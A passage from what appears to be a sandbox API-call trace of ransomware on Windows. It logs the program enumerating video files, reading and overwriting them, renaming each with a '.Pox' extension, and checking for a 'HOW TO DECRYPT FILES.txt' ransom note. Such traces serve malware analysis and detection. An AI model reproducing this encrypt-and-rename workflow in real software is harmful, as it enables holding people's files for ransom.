ftLastWriteTime.dwHighDateTime=0x1d4d586, nFileSizeHigh=0x0, nFileSizeLow=0x10bbd, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0fJr8b4TB.avi", cAlternateFileName="V0FJR8~1.AVI")) returned 1 [0041.603] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38294fd0, ftCreationTime.dwHighDateTime=0x1d4cfec, ftLastAccessTime.dwLowDateTime=0xbf7744a0, ftLastAccessTime.dwHighDateTime=0x1d4d533, ftLastWriteTime.dwLowDateTime=0xbf7744a0, ftLastWriteTime.dwHighDateTime=0x1d4d533, nFileSizeHigh=0x0, nFileSizeLow=0x15c1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="zX3Ey.avi", cAlternateFileName="")) returned 1 [0041.603] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38294fd0, ftCreationTime.dwHighDateTime=0x1d4cfec, ftLastAccessTime.dwLowDateTime=0xbf7744a0, ftLastAccessTime.dwHighDateTime=0x1d4d533, ftLastWriteTime.dwLowDateTime=0xbf7744a0, ftLastWriteTime.dwHighDateTime=0x1d4d533, nFileSizeHigh=0x0, nFileSizeLow=0x15c1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="zX3Ey.avi", cAlternateFileName="")) returned 0 [0041.603] FindClose (in: hFindFile=0x405d88 | out: hFindFile=0x405d88) returned 1 [0041.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4f0) returned 1 [0041.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4fc) returned 1 [0041.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\V0fJr8b4TB.avi", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\V0fJr8b4TB.avi", lpFilePart=0x0) returned 0x44 [0041.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0041.603] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\V0fJr8b4TB.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\v0fjr8b4tb.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.604] GetFileType (hFile=0x26c) returned 0x1 [0041.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0041.604] GetFileType (hFile=0x26c) returned 0x1 [0041.604] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0x10bbd [0041.604] ReadFile (in: hFile=0x26c, lpBuffer=0x24fa794, nNumberOfBytesToRead=0x10bbd, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x24fa794*, lpNumberOfBytesRead=0x3ae488*=0x10bbd, lpOverlapped=0x0) returned 1 [0041.605] CloseHandle (hObject=0x26c) returned 1 [0041.621] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0041.621] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0041.621] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\V0fJr8b4TB.avi", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\V0fJr8b4TB.avi", lpFilePart=0x0) returned 0x44 [0041.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0041.621] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\V0fJr8b4TB.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\v0fjr8b4tb.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.622] GetFileType (hFile=0x26c) returned 0x1 [0041.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0041.623] GetFileType (hFile=0x26c) returned 0x1 [0041.623] WriteFile (in: hFile=0x26c, lpBuffer=0x25798d4*, nNumberOfBytesToWrite=0x10bc0, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x25798d4*, lpNumberOfBytesWritten=0x3ae47c*=0x10bc0, lpOverlapped=0x0) returned 1 [0041.624] CloseHandle (hObject=0x26c) returned 1 [0041.628] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\V0fJr8b4TB.avi", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\V0fJr8b4TB.avi", lpFilePart=0x0) returned 0x44 [0041.628] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\V0fJr8b4TB.avi.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\V0fJr8b4TB.avi.Pox", lpFilePart=0x0) returned 0x48 [0041.628] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0041.628] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\V0fJr8b4TB.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\v0fjr8b4tb.avi"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21dcbda0, ftCreationTime.dwHighDateTime=0x1d4d386, ftLastAccessTime.dwLowDateTime=0xc86911d0, ftLastAccessTime.dwHighDateTime=0x1d4d586, ftLastWriteTime.dwLowDateTime=0x2aff85c0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x10bc0)) returned 1 [0041.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae45c) returned 1 [0041.628] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\V0fJr8b4TB.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\v0fjr8b4tb.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\V0fJr8b4TB.avi.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\v0fjr8b4tb.avi.pox")) returned 1 [0041.629] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\zX3Ey.avi", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\zX3Ey.avi", lpFilePart=0x0) returned 0x3f [0041.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0041.629] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\zX3Ey.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\zx3ey.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.629] GetFileType (hFile=0x26c) returned 0x1 [0041.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0041.629] GetFileType (hFile=0x26c) returned 0x1 [0041.629] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0x15c1f [0041.630] ReadFile (in: hFile=0x26c, lpBuffer=0x35dc720, nNumberOfBytesToRead=0x15c1f, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x35dc720*, lpNumberOfBytesRead=0x3ae488*=0x15c1f, lpOverlapped=0x0) returned 1 [0041.632] CloseHandle (hObject=0x26c) returned 1 [0041.757] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0041.758] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0041.758] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\zX3Ey.avi", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\zX3Ey.avi", lpFilePart=0x0) returned 0x3f [0041.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0041.758] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\zX3Ey.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\zx3ey.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.759] GetFileType (hFile=0x26c) returned 0x1 [0041.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0041.760] GetFileType (hFile=0x26c) returned 0x1 [0041.760] WriteFile (in: hFile=0x26c, lpBuffer=0x3649400*, nNumberOfBytesToWrite=0x15c20, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x3649400*, lpNumberOfBytesWritten=0x3ae47c*=0x15c20, lpOverlapped=0x0) returned 1 [0041.762] CloseHandle (hObject=0x26c) returned 1 [0041.763] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\zX3Ey.avi", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\zX3Ey.avi", lpFilePart=0x0) returned 0x3f [0041.763] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\zX3Ey.avi.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\zX3Ey.avi.Pox", lpFilePart=0x0) returned 0x43 [0041.763] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0041.763] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\zX3Ey.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\zx3ey.avi"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38294fd0, ftCreationTime.dwHighDateTime=0x1d4cfec, ftLastAccessTime.dwLowDateTime=0xbf7744a0, ftLastAccessTime.dwHighDateTime=0x1d4d533, ftLastWriteTime.dwLowDateTime=0x2b1290c0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x15c20)) returned 1 [0041.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae45c) returned 1 [0041.764] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\zX3Ey.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\zx3ey.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\zX3Ey.avi.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\zx3ey.avi.pox")) returned 1 [0041.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0041.764] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog", nBufferLength=0x105, lpBuffer=0x3adfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog", lpFilePart=0x0) returned 0x43 [0041.764] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog\\", nBufferLength=0x105, lpBuffer=0x3adf98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog\\", lpFilePart=0x0) returned 0x44 [0041.764] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog\\*", lpFindFileData=0x3ae1e4 | out: lpFindFileData=0x3ae1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5df3f0d0, ftCreationTime.dwHighDateTime=0x1d4d4c9, ftLastAccessTime.dwLowDateTime=0x38064c0, ftLastAccessTime.dwHighDateTime=0x1d4cd54, ftLastWriteTime.dwLowDateTime=0x38064c0, ftLastWriteTime.dwHighDateTime=0x1d4cd54, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0041.764] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5df3f0d0, ftCreationTime.dwHighDateTime=0x1d4d4c9, ftLastAccessTime.dwLowDateTime=0x38064c0, ftLastAccessTime.dwHighDateTime=0x1d4cd54, ftLastWriteTime.dwLowDateTime=0x38064c0, ftLastWriteTime.dwHighDateTime=0x1d4cd54, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.765] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef41250, ftCreationTime.dwHighDateTime=0x1d4c8fb, ftLastAccessTime.dwLowDateTime=0xfb2f2770, ftLastAccessTime.dwHighDateTime=0x1d4c628, ftLastWriteTime.dwLowDateTime=0xfb2f2770, ftLastWriteTime.dwHighDateTime=0x1d4c628, nFileSizeHigh=0x0, nFileSizeLow=0x111e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="-k2BqoPf.flv", cAlternateFileName="")) returned 1 [0041.765] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41b27390, ftCreationTime.dwHighDateTime=0x1d4c742, ftLastAccessTime.dwLowDateTime=0x4a5301a0, ftLastAccessTime.dwHighDateTime=0x1d4c6d3, ftLastWriteTime.dwLowDateTime=0x4a5301a0, ftLastWriteTime.dwHighDateTime=0x1d4c6d3, nFileSizeHigh=0x0, nFileSizeLow=0x15ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8Pz6FCHO31ZeTuXYDv8m.avi", cAlternateFileName="8PZ6FC~1.AVI")) returned 1 [0041.765] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ba36990, ftCreationTime.dwHighDateTime=0x1d4c8e7, ftLastAccessTime.dwLowDateTime=0x7cf8c810, ftLastAccessTime.dwHighDateTime=0x1d4cc3c, ftLastWriteTime.dwLowDateTime=0x7cf8c810, ftLastWriteTime.dwHighDateTime=0x1d4cc3c, nFileSizeHigh=0x0, nFileSizeLow=0xc03f, dwReserved0=0x0, dwReserved1=0x0, cFileName="IiCAWEx.swf", cAlternateFileName="")) returned 1 [0041.765] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5acb16c0, ftCreationTime.dwHighDateTime=0x1d4d18d, ftLastAccessTime.dwLowDateTime=0xfe1c27e0, ftLastAccessTime.dwHighDateTime=0x1d4d513, ftLastWriteTime.dwLowDateTime=0xfe1c27e0, ftLastWriteTime.dwHighDateTime=0x1d4d513, nFileSizeHigh=0x0, nFileSizeLow=0x9f38, dwReserved0=0x0, dwReserved1=0x0, cFileName="PLZ7_L.flv", cAlternateFileName="")) returned 1 [0041.765] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.766] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0041.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae47c) returned 1 [0041.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae488) returned 1 [0041.766] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0041.766] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog", nBufferLength=0x105, lpBuffer=0x3adfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog", lpFilePart=0x0) returned 0x43 [0041.766] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog\\", nBufferLength=0x105, lpBuffer=0x3adf98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog\\", lpFilePart=0x0) returned 0x44 [0041.766] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog\\*", lpFindFileData=0x3ae1e4 | out: lpFindFileData=0x3ae1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5df3f0d0, ftCreationTime.dwHighDateTime=0x1d4d4c9, ftLastAccessTime.dwLowDateTime=0x38064c0, ftLastAccessTime.dwHighDateTime=0x1d4cd54, ftLastWriteTime.dwLowDateTime=0x38064c0, ftLastWriteTime.dwHighDateTime=0x1d4cd54, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0041.766] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5df3f0d0, ftCreationTime.dwHighDateTime=0x1d4d4c9, ftLastAccessTime.dwLowDateTime=0x38064c0, ftLastAccessTime.dwHighDateTime=0x1d4cd54, ftLastWriteTime.dwLowDateTime=0x38064c0, ftLastWriteTime.dwHighDateTime=0x1d4cd54, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.766] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef41250, ftCreationTime.dwHighDateTime=0x1d4c8fb, ftLastAccessTime.dwLowDateTime=0xfb2f2770, ftLastAccessTime.dwHighDateTime=0x1d4c628, ftLastWriteTime.dwLowDateTime=0xfb2f2770, ftLastWriteTime.dwHighDateTime=0x1d4c628, nFileSizeHigh=0x0, nFileSizeLow=0x111e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="-k2BqoPf.flv", cAlternateFileName="")) returned 1 [0041.766] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41b27390, ftCreationTime.dwHighDateTime=0x1d4c742, ftLastAccessTime.dwLowDateTime=0x4a5301a0, ftLastAccessTime.dwHighDateTime=0x1d4c6d3, ftLastWriteTime.dwLowDateTime=0x4a5301a0, ftLastWriteTime.dwHighDateTime=0x1d4c6d3, nFileSizeHigh=0x0, nFileSizeLow=0x15ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8Pz6FCHO31ZeTuXYDv8m.avi", cAlternateFileName="8PZ6FC~1.AVI")) returned 1 [0041.767] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ba36990, ftCreationTime.dwHighDateTime=0x1d4c8e7, ftLastAccessTime.dwLowDateTime=0x7cf8c810, ftLastAccessTime.dwHighDateTime=0x1d4cc3c, ftLastWriteTime.dwLowDateTime=0x7cf8c810, ftLastWriteTime.dwHighDateTime=0x1d4cc3c, nFileSizeHigh=0x0, nFileSizeLow=0xc03f, dwReserved0=0x0, dwReserved1=0x0, cFileName="IiCAWEx.swf", cAlternateFileName="")) returned 1 [0041.767] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5acb16c0, ftCreationTime.dwHighDateTime=0x1d4d18d, ftLastAccessTime.dwLowDateTime=0xfe1c27e0, ftLastAccessTime.dwHighDateTime=0x1d4d513, ftLastWriteTime.dwLowDateTime=0xfe1c27e0, ftLastWriteTime.dwHighDateTime=0x1d4d513, nFileSizeHigh=0x0, nFileSizeLow=0x9f38, dwReserved0=0x0, dwReserved1=0x0, cFileName="PLZ7_L.flv", cAlternateFileName="")) returned 1 [0041.767] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5acb16c0, ftCreationTime.dwHighDateTime=0x1d4d18d, ftLastAccessTime.dwLowDateTime=0xfe1c27e0, ftLastAccessTime.dwHighDateTime=0x1d4d513, ftLastWriteTime.dwLowDateTime=0xfe1c27e0, ftLastWriteTime.dwHighDateTime=0x1d4d513, nFileSizeHigh=0x0, nFileSizeLow=0x9f38, dwReserved0=0x0, dwReserved1=0x0, cFileName="PLZ7_L.flv", cAlternateFileName="")) returned 0 [0041.767] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0041.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae47c) returned 1 [0041.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae488) returned 1 [0041.767] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog\\8Pz6FCHO31ZeTuXYDv8m.avi", nBufferLength=0x105, lpBuffer=0x3ade6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog\\8Pz6FCHO31ZeTuXYDv8m.avi", lpFilePart=0x0) returned 0x5c [0041.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae360) returned 1 [0041.767] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\Hy_v9XfWfaIog\\8Pz6FCHO31ZeTuXYDv8m.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\1eg_rmljw\\hy_v9xfwfaiog\\8pz6fcho31zetuxydv8m.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.768] GetFileType (hFile=0x26c) returned 0x1 [0041.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae35c) returned 1 [0041.768] GetFileType (hFile=0x26c) returned 0x1 [0041.768] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae468 | out: lpFileSizeHigh=0x3ae468*=0x0) returned 0x15ab0 [0041.768] ReadFile (in: hFile=0x26c, lpBuffer=0x365f040, nNumberOfBytesToRead=0x15ab0, lpNumberOfBytesRead=0x3ae414, lpOverlapped=0x0 | out: lpBuffer=0x365f040*, lpNumberOfBytesRead=0x3ae414*=0x15ab0, lpOverlapped=0x0) returned 1 [0041.770] CloseHandle (hObject=0x26c) returned 1 [0041.791] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adf80, 